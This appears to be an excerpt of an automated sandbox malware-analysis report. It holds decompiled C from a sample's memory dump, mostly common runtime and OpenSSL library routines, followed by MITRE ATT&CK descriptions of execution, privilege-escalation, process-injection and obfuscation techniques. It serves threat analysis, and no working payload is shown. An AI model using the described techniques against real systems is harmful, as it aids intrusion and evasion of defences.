							E0044F23E(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t101);
							_push(_t142);
							_push(_t130);
							_t131 = _v20;
							__eflags =  *((intOrPtr*)(_t109 + 0x10)) - _t131;
							_t132 =  <  ?  *((void*)(_t109 + 0x10)) : _t131;
							__eflags =  *((intOrPtr*)(_t109 + 0x14)) - 8;
							if( *((intOrPtr*)(_t109 + 0x14)) >= 8) {
								_t109 =  *_t109;
							}
							_t102 = _a12;
							__eflags = _t132 - _t102;
							_t144 =  <  ? _t132 : _t102;
							__eflags = _t144;
							if(_t144 == 0) {
								L51:
								_t67 = 0;
								__eflags = 0;
							} else {
								_t120 = _a8;
								while(1) {
									__eflags =  *_t109 -  *_t120;
									if( *_t109 !=  *_t120) {
										break;
									}
									_t109 = _t109 + 2;
									_t120 = _t120 + 2;
									_t144 = _t144 - 1;
									__eflags = _t144;
									if(_t144 != 0) {
										continue;
									} else {
										goto L51;
									}
									goto L52;
								}
								_t71 =  *_t109 & 0x0000ffff;
								__eflags = _t71 -  *_t120;
								asm("sbb eax, eax");
								_t67 = (_t71 & 0xfffffffe) + 1;
							}
							L52:
							__eflags = _t67;
							if(_t67 != 0) {
								L57:
								return _t67;
							} else {
								__eflags = _t132 - _t102;
								if(_t132 >= _t102) {
									__eflags = _t132 - _t102;
									_t63 = _t132 != _t102;
									__eflags = _t63;
									_t67 = 0 | _t63;
									goto L57;
								} else {
									_t69 = _t67 | 0xffffffff;
									__eflags = _t69;
									return _t69;
								}
							}
						} else {
							_t123 = _t122 - _t101;
							_v12 = _t123;
							__eflags = _t109 - _t101;
							if(_t109 < _t101) {
								_t88 =  *((intOrPtr*)(_t142 + 0x14));
								__eflags = _t88 - 8;
								if(_t88 < 8) {
									_a8 = _t142;
								} else {
									_a8 =  *_t142;
									_t130 = _a12;
								}
								__eflags = _t88 - 8;
								if(_t88 < 8) {
									_v8 = _t142;
								} else {
									_v8 =  *_t142;
								}
								__eflags = _t123;
								if(_t123 != 0) {
									E004205A0(_v8 + (_a4 + _t109) * 2, _a8 + (_a4 + _t101) * 2, _t123 + _t123);
									_t130 = _a12;
									_t151 = _t151 + 0xc;
									_t109 = _a16;
								}
							}
							__eflags = _t109;
							if(_t109 != 0) {
								L26:
								_a8 = _t109 - _t101 +  *(_t142 + 0x10);
								_t76 = E00415D50(_t101, _t142, _t130, _t142, _t109 - _t101 +  *(_t142 + 0x10), 0);
								__eflags = _t76;
								if(_t76 != 0) {
									_t113 = _a16;
									__eflags = _t101 - _t113;
									if(_t101 >= _t113) {
										_t107 = _a4;
									} else {
										_t82 =  *((intOrPtr*)(_t142 + 0x14));
										__eflags = _t82 - 8;
										if(_t82 < 8) {
											_t125 = _t142;
										} else {
											_t125 =  *_t142;
										}
										__eflags = _t82 - 8;
										if(_t82 < 8) {
											_a12 = _t142;
										} else {
											_a12 =  *_t142;
										}
										_t107 = _a4;
										E0040B600(_a12 + (_a4 + _t113) * 2, _t125 + (_a4 + _t101) * 2, _v12);
										_t113 = _a16;
										_t151 = _t151 + 4;
									}
									__eflags =  *((intOrPtr*)(_t142 + 0x14)) - 8;
									if( *((intOrPtr*)(_t142 + 0x14)) < 8) {
										_t124 = _t142;
									} else {
										_t124 =  *_t142;
									}
									__eflags = _t113;
									if(_t113 != 0) {
										E0042D8D0(_t124 + _t107 * 2, _t130, _t113 + _t113);
									}
									E00414DF0(_t142, _a8);
								}
							} else {
								__eflags = _t101;
								if(_t101 != 0) {
									goto L26;
								}
							}
							return _t142;
						}
					}
				} else {
					_t118 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t118 < 8) {
						_t96 = __ecx;
					} else {
						_t96 =  *__ecx;
					}
					if(_t130 < _t96) {
						goto L13;
					} else {
						if(_t118 < 8) {
							_t128 = _t142;
						} else {
							_t128 =  *_t142;
						}
						if(_t128 +  *(_t142 + 0x10) * 2 <= _t130) {
							goto L13;
						} else {
							if(_t118 < 8) {
								_t99 = _t142;
							} else {
								_t99 =  *_t142;
							}
							return E00414920(_t101, _t142, _t130 - _t99 >> 1, _t142, _a4, _a8, _t142, _t130 - _t99 >> 1, _a16);
						}
					}
				}
			}

0x00417d50
0x00417d58
0x00417d5b
0x00417d5f
0x00417db1
0x00417db1
0x00417db4
0x00417db7
0x00417db9
0x00417edf
0x00417ee4
0x00000000
0x00417dbf
0x00417dc1
0x00417dc3
0x00417dc6
0x00417dc7
0x00417dca
0x00417dcc
0x00417dcf
0x00417dd1
0x00417dd9
0x00417ddc
0x00417ee9
0x00417ee9
0x00417eee
0x00417ef3
0x00417ef4
0x00417ef5
0x00417ef6
0x00417ef7
0x00417ef8
0x00417ef9
0x00417efa
0x00417efb
0x00417efc
0x00417efd
0x00417efe
0x00417eff
0x00417f03
0x00417f04
0x00417f05
0x00417f06
0x00417f09
0x00417f0c
0x00417f10
0x00417f14
0x00417f16
0x00417f16
0x00417f18
0x00417f1b
0x00417f1f
0x00417f22
0x00417f24
0x00417f41
0x00417f41
0x00417f41
0x00417f26
0x00417f26
0x00417f30
0x00417f33
0x00417f36
0x00000000
0x00000000
0x00417f38
0x00417f3b
0x00417f3e
0x00417f3e
0x00417f3f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00417f3f
0x00417f55
0x00417f58
0x00417f5b
0x00417f60
0x00417f60
0x00417f43
0x00417f43
0x00417f45
0x00417f6a
0x00417f6e
0x00417f47
0x00417f47
0x00417f49
0x00417f65
0x00417f67
0x00417f67
0x00417f67
0x00000000
0x00417f4b
0x00417f4d
0x00417f4d
0x00417f52
0x00417f52
0x00417f49
0x00417de2
0x00417de2
0x00417de4
0x00417de7
0x00417de9
0x00417deb
0x00417dee
0x00417df1
0x00417dfd
0x00417df3
0x00417df5
0x00417df8
0x00417df8
0x00417e00
0x00417e03
0x00417e0c
0x00417e05
0x00417e07
0x00417e07
0x00417e0f
0x00417e11
0x00417e2e
0x00417e33
0x00417e36
0x00417e39
0x00417e39
0x00417e11
0x00417e3c
0x00417e3e
0x00417e48
0x00417e4f
0x00417e55
0x00417e5a
0x00417e5c
0x00417e5e
0x00417e61
0x00417e63
0x00417ea6
0x00417e65
0x00417e65
0x00417e68
0x00417e6b
0x00417e71
0x00417e6d
0x00417e6d
0x00417e6d
0x00417e73
0x00417e76
0x00417e7f
0x00417e78
0x00417e7a
0x00417e7a
0x00417e8a
0x00417e99
0x00417e9e
0x00417ea1
0x00417ea1
0x00417ea9
0x00417ead
0x00417eb3
0x00417eaf
0x00417eaf
0x00417eaf
0x00417eb5
0x00417eb7
0x00417ec2
0x00417ec7
0x00417ecf
0x00417ecf
0x00417e40
0x00417e40
0x00417e42
0x00000000
0x00000000
0x00417e42
0x00417edc
0x00417edc
0x00417ddc
0x00417d61
0x00417d61
0x00417d67
0x00417d6d
0x00417d69
0x00417d69
0x00417d69
0x00417d71
0x00000000
0x00417d73
0x00417d76
0x00417d7c
0x00417d78
0x00417d78
0x00417d78
0x00417d86
0x00000000
0x00417d88
0x00417d8b
0x00417d91
0x00417d8d
0x00417d8d
0x00417d8d
0x00417dae
0x00417dae
0x00417d86
0x00417d71

APIs

_memmove.LIBCMT ref: 00417E2E

Strings

string too long, xrefs: 00417EE9
invalid string position, xrefs: 00417EDF

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
Instruction ID: 388339a757d446dde0ac97e241c54aefb3b464f1a8010d5a2c21a1bfa385432d
Opcode Fuzzy Hash: 964545c748993364f79d16a0f131f75f7c6f97d2359d890db139b78c498e4dd2
Instruction Fuzzy Hash: AC517F317042099BCF24DF19D9808EAB7B6FF85304B20456FE8158B351DB39ED968BE9

Uniqueness

Uniqueness Score: -1.00%

Function 004516A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004516A0(void* __ebx, void* __edi) {
				char* _t6;
				intOrPtr _t12;
				void* _t14;
				char* _t16;
				char** _t19;
				void* _t21;
				void* _t22;
				void* _t23;

				E004547A0(_t14, __edi, 5, 1, ".\\crypto\\err\\err.c", 0x244);
				_t22 = _t21 + 0x10;
				if( *0x50b6d4 != 0) {
					E004547A0(_t14, __edi, 6, 1, ".\\crypto\\err\\err.c", 0x24b);
					E004547A0(_t14, __edi, 9, 1, ".\\crypto\\err\\err.c", 0x24c);
					_t23 = _t22 + 0x20;
					__eflags =  *0x50b6d4;
					if( *0x50b6d4 != 0) {
						_push(__ebx);
						_push(__edi);
						_t12 = 1;
						_t16 = 0x5117e0;
						_t19 = 0x5113e4;
						do {
							__eflags =  *_t19;
							 *((intOrPtr*)(_t19 - 4)) = _t12;
							if(__eflags == 0) {
								_push(_t12);
								_t6 = E004C5D39(_t12, _t14, __eflags);
								_t23 = _t23 + 4;
								__eflags = _t6;
								if(_t6 != 0) {
									E004C5E00(_t16, _t6, 0x20);
									_t23 = _t23 + 0xc;
									_t16[0x1f] = 0;
									 *_t19 = _t16;
								}
								__eflags =  *_t19;
								if( *_t19 == 0) {
									 *_t19 = "unknown";
								}
							}
							_t19 =  &(_t19[2]);
							_t12 = _t12 + 1;
							_t16 =  &(_t16[0x20]);
							__eflags = _t19 - 0x5117d4;
						} while (_t19 <= 0x5117d4);
						 *0x50b6d4 = 0;
						return E004547A0(_t14, _t16, 0xa, 1, ".\\crypto\\err\\err.c", 0x26c);
					} else {
						return E004547A0(_t14, __edi, 0xa, 1, ".\\crypto\\err\\err.c", 0x24f);
					}
				} else {
					return E004547A0(_t14, __edi, 6, 1, ".\\crypto\\err\\err.c", 0x247);
				}
			}

0x004516ae
0x004516b3
0x004516bd
0x004516e4
0x004516f7
0x004516fc
0x004516ff
0x00451706
0x0045171f
0x00451721
0x00451722
0x00451727
0x0045172c
0x00451731
0x00451731
0x00451734
0x00451737
0x00451739
0x0045173a
0x0045173f
0x00451742
0x00451744
0x0045174a
0x0045174f
0x00451752
0x00451756
0x00451756
0x00451758
0x0045175b
0x0045175d
0x0045175d
0x0045175b
0x00451763
0x00451766
0x00451767
0x0045176a
0x0045176a
0x00451780
0x00451795
0x00451708
0x0045171e
0x0045171e
0x004516bf
0x004516d5
0x004516d5

Strings

unknown, xrefs: 0045175D
.\crypto\err\err.c, xrefs: 004516A5, 004516C4, 004516DB, 004516EE, 0045170D, 00451777

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID:
String ID: .\crypto\err\err.c$unknown
API String ID: 0-565200744
Opcode ID: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction ID: d1206a4052711c5ef0d05e5a1f97d3c0da723a5ab1c334b9285c6dd525f2274c
Opcode Fuzzy Hash: 9dae3d662d88e5d53485dd14566563c9255a5f0e4e3b7cf97cf97a7a2e17faf8
Instruction Fuzzy Hash: 72117C69F8070067F6202B166C87F562A819764B5AF55042FFA482D3C3E2FE54D8829E

Uniqueness

Uniqueness Score: -1.00%

Function 0042A77E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 88%

			E0042A77E(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v808;
				int _t9;
				intOrPtr _t14;
				signed int _t15;
				signed int _t17;
				signed int _t19;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr* _t30;
				intOrPtr* _t32;
				void* _t35;

				_t28 = __esi;
				_t27 = __edi;
				_t26 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t35 = _t23 -  *0x50ad20; // 0x934ff656
				if(_t35 == 0) {
					asm("repe ret");
				}
				_t30 = _t32;
				_t9 = IsProcessorFeaturePresent(0x17);
				if(_t9 != 0) {
					_t23 = 2;
					asm("int 0x29");
				}
				 *0x510e38 = _t9;
				 *0x510e34 = _t23;
				 *0x510e30 = _t26;
				 *0x510e2c = _t22;
				 *0x510e28 = _t28;
				 *0x510e24 = _t27;
				 *0x510e50 = ss;
				 *0x510e44 = cs;
				 *0x510e20 = ds;
				 *0x510e1c = es;
				 *0x510e18 = fs;
				 *0x510e14 = gs;
				asm("pushfd");
				_pop( *0x510e48);
				 *0x510e3c =  *_t30;
				 *0x510e40 = _v0;
				 *0x510e4c =  &_a4;
				 *0x510d88 = 0x10001;
				_t14 =  *0x510e40; // 0x0
				 *0x510d44 = _t14;
				 *0x510d38 = 0xc0000409;
				 *0x510d3c = 1;
				 *0x510d48 = 1;
				_t15 = 4;
				 *((intOrPtr*)(0x510d4c + _t15 * 0)) = 2;
				_t17 = 4;
				_t24 =  *0x50ad20; // 0x934ff656
				 *((intOrPtr*)(_t30 + _t17 * 0 - 8)) = _t24;
				_t19 = 4;
				_t25 =  *0x50ad24; // 0x6cb009a9
				 *((intOrPtr*)(_t30 + (_t19 << 0) - 8)) = _t25;
				return E0042AB4B(_t19 << 0, "8\rQ");
			}

0x0042a77e
0x0042a77e
0x0042a77e
0x0042a77e
0x0042a77e
0x0042a77e
0x0042a784
0x0042a786
0x0042a786
0x0042ab89
0x0042ab93
0x0042ab9a
0x0042ab9e
0x0042ab9f
0x0042ab9f
0x0042aba1
0x0042aba6
0x0042abac
0x0042abb2
0x0042abb8
0x0042abbe
0x0042abc4
0x0042abcb
0x0042abd2
0x0042abd9
0x0042abe0
0x0042abe7
0x0042abee
0x0042abef
0x0042abf8
0x0042ac00
0x0042ac08
0x0042ac13
0x0042ac1d
0x0042ac22
0x0042ac27
0x0042ac31
0x0042ac3b
0x0042ac47
0x0042ac4b
0x0042ac57
0x0042ac5b
0x0042ac61
0x0042ac67
0x0042ac6b
0x0042ac71
0x0042ac82

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0042AB93
___raise_securityfailure.LIBCMT ref: 0042AC7A

Strings

8Q, xrefs: 0042AC75

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8Q
API String ID: 3761405300-2096853525
Opcode ID: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction ID: cc78ca7643d31f84c049b3cf87471233b0d3094e131d8c276326ba2ae67c1d9c
Opcode Fuzzy Hash: eccf15afe34b7bdc1ccbb155ef79912499653c52d5481e078dd775b5985af611
Instruction Fuzzy Hash: 4F21FFB5500304DBD750DF56F981A843BE9BB68310F10AA1AE908CB7E0D7F559D8EF45

Uniqueness

Uniqueness Score: -1.00%

Function 00413C40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00413C40(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr* _t18;
				void* _t20;
				intOrPtr _t22;
				intOrPtr* _t25;
				intOrPtr* _t27;
				void* _t32;

				_t18 = __ecx;
				_t25 = __ecx;
				_push(__edi);
				_t22 = _a4;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				if(_t22 == 0) {
					L4:
					return _t25;
				} else {
					_t36 = _t22 - 0xffffffff;
					if(_t22 > 0xffffffff) {
						_push("vector<T> too long");
						E0044F23E(__eflags);
						goto L6;
					} else {
						_t15 = E00423B4C(__ebx, _t20, _t22, _t36, _t22);
						_t32 = _t32 + 4;
						if(_t15 == 0) {
							L6:
							E0044F1BB(__eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t25);
							_t27 = _t18;
							_t14 =  *_t27;
							__eflags = _t14;
							if(_t14 != 0) {
								_t14 = L00422587(_t14);
								 *_t27 = 0;
								 *((intOrPtr*)(_t27 + 4)) = 0;
								 *((intOrPtr*)(_t27 + 8)) = 0;
							}
							return _t14;
						} else {
							 *_t25 = _t15;
							 *((intOrPtr*)(_t25 + 4)) = _t15;
							 *((intOrPtr*)(_t25 + 8)) = _t15 + _t22;
							E0042B420(_t15, 0, _t22);
							 *((intOrPtr*)(_t25 + 4)) =  *((intOrPtr*)(_t25 + 4)) + _t22;
							goto L4;
						}
					}
				}
			}

0x00413c40
0x00413c44
0x00413c46
0x00413c47
0x00413c4a
0x00413c50
0x00413c57
0x00413c60
0x00413c8e
0x00413c93
0x00413c62
0x00413c62
0x00413c65
0x00413c96
0x00413c9b
0x00000000
0x00413c67
0x00413c68
0x00413c6d
0x00413c72
0x00413ca0
0x00413ca0
0x00413ca5
0x00413ca6
0x00413ca7
0x00413ca8
0x00413ca9
0x00413caa
0x00413cab
0x00413cac
0x00413cad
0x00413cae
0x00413caf
0x00413cb0
0x00413cb1
0x00413cb3
0x00413cb5
0x00413cb7
0x00413cba
0x00413cc2
0x00413cc8
0x00413ccf
0x00413ccf
0x00413cd7
0x00413c74
0x00413c78
0x00413c7d
0x00413c80
0x00413c83
0x00413c8b
0x00000000
0x00413c8b
0x00413c72
0x00413c65

APIs

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00413CA0

Part of subcall function 00423B4C: _malloc.LIBCMT ref: 00423B64

_memset.LIBCMT ref: 00413C83

Strings

vector<T> too long, xrefs: 00413C96

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
String ID: vector<T> too long
API String ID: 1327501947-3788999226
Opcode ID: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
Instruction ID: e8ff6f7d1438dbc4cc0d31425bbcf17e71e6c586c3cd126e38002517ea96b8c1
Opcode Fuzzy Hash: 13dbab4e4c979af06a9cf2652985864a633ab205e3cc78c94b6fadd0ced0ada8
Instruction Fuzzy Hash: AB0192B25003105BE3309F1AE801797B7E8AF40765F14842EE99993781F7B9E984C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 00480620 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E00480620(void* __ebx, void* __edx, void* __ebp, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12) {
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				void* _t13;
				intOrPtr* _t15;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;
				void* _t31;
				void* _t32;

				_t29 = _a4;
				_t10 =  *_t29;
				_t34 =  *((intOrPtr*)(_t10 + 8)) - 0x40;
				if( *((intOrPtr*)(_t10 + 8)) > 0x40) {
					E00454C00(__ebx, __edx, _t27, _t29, __ebp, _t34, ".\\crypto\\evp\\digest.c", 0x10f, "ctx->digest->md_size <= EVP_MAX_MD_SIZE");
					_t31 = _t31 + 0xc;
				}
				_t13 =  *((intOrPtr*)( *((intOrPtr*)( *_t29 + 0x18))))(_t29, _a8);
				_t26 = _a12;
				_t32 = _t31 + 8;
				_t28 = _t13;
				if(_t26 != 0) {
					 *_t26 =  *((intOrPtr*)( *_t29 + 8));
				}
				_t15 =  *((intOrPtr*)( *_t29 + 0x20));
				if(_t15 != 0) {
					 *_t15(_t29);
					E0047D100(_t29, 2);
					_t32 = _t32 + 0xc;
				}
				E0042B420( *((intOrPtr*)(_t29 + 0xc)), 0,  *((intOrPtr*)( *_t29 + 0x44)));
				return _t28;
			}

0x00480621
0x00480626
0x00480628
0x0048062c
0x0048063d
0x00480642
0x00480642
0x0048064f
0x00480651
0x00480655
0x00480658
0x0048065c
0x00480663
0x00480663
0x00480667
0x0048066c
0x0048066f
0x00480674
0x00480679
0x00480679
0x00480686
0x00480692

APIs

_memset.LIBCMT ref: 00480686

Part of subcall function 00454C00: _raise.LIBCMT ref: 00454C18

Strings

.\crypto\evp\digest.c, xrefs: 00480638
ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 0048062E

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: _memset_raise
String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
API String ID: 1484197835-3867593797
Opcode ID: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction ID: 96aa535d5fc7c596ca855a62b55a20e08de4f59c43588781e3518ec4b5147bd0
Opcode Fuzzy Hash: 332f563a29a4ae085e93c3cfda2a52d89a6f4a051d037047c0cfd39b7a6a7ebb
Instruction Fuzzy Hash: 82012C756002109FC311EF09EC42E5AB7E5AFC8304F15446AF6889B352E765EC558B99

Uniqueness

Uniqueness Score: -1.00%

Function 004242A7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C,?,00427F58,00000003,00428BB9,00507BD0,00000008,00428B0E,i;B), ref: 004242B0
__invoke_watson.LIBCMT ref: 004242CC

Strings

i;B, xrefs: 004242C9

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: DecodePointer__invoke_watson
String ID: i;B
API String ID: 4034010525-472376889
Opcode ID: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
Instruction ID: 4f0f565c0ac0667cc87bbfc5f091dd064a73676b217a34b06ab6fef57441037f
Opcode Fuzzy Hash: 861cb4a8f49b93517597d00acdac5812cd007012726ad0a3f4681ad684a4087f
Instruction Fuzzy Hash: D2E0EC31510119FBDF012FA2EC05DAA3B69FF44294B8044A5FE1480171D776C870ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 0044F23E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0044F23E(void* __eflags, char _a4) {
				char _v12;
				char _v16;
				char _v32;
				char _v40;
				char _v60;
				intOrPtr _v68;
				char _v92;
				char _v100;
				char _v120;
				void* _t58;
				void* _t63;
				void* _t64;
				void* _t65;

				_t58 = _t63;
				_t64 = _t63 - 0xc;
				E00430CFC( &_v16,  &_a4);
				_v16 = 0x4d6554;
				E00430ECA( &_v16, 0x5081fc);
				asm("int3");
				_push(_t58);
				_t65 = _t64 - 0xc;
				E00430CFC( &_v32,  &_v12);
				_v32 = 0x4d6560;
				E00430ECA( &_v32, 0x508238);
				asm("int3");
				_push(_t64);
				E00430CFC( &_v60,  &_v40);
				_v60 = 0x4d6578;
				E00430ECA( &_v60, 0x508274);
				asm("int3");
				_push(_t65);
				E0044EF74( &_v92, _v68);
				E00430ECA( &_v92, 0x508320);
				asm("int3");
				_push(_t65 - 0xc);
				E00430CFC( &_v120,  &_v100);
				_v120 = 0x4d656c;
				E00430ECA( &_v120, 0x5082cc);
				asm("int3");
				return "bad function call";
			}

0x0044f23f
0x0044f241
0x0044f251
0x0044f25e
0x0044f266
0x0044f26b
0x0044f26c
0x0044f26f
0x0044f27f
0x0044f28c
0x0044f294
0x0044f299
0x0044f29a
0x0044f2ad
0x0044f2ba
0x0044f2c2
0x0044f2c7
0x0044f2c8
0x0044f2d4
0x0044f2e2
0x0044f2e7
0x0044f2e8
0x0044f2fb
0x0044f308
0x0044f310
0x0044f315
0x0044f31b

APIs

std::exception::exception.LIBCMT ref: 0044F251

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F266

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

Strings

TeM, xrefs: 0044F247, 0044F25B

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
String ID: TeM
API String ID: 757275642-2215902641
Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction ID: d1ee5d24d6598838e25116ba354c7cf631fb5eda6106ebacc41b25e9fbee45cd
Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
Instruction Fuzzy Hash: 8FD06774D0020DBBCB04EFA5D59ACCDBBB8AA04348F009567AD1597241EA78A7498B99

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
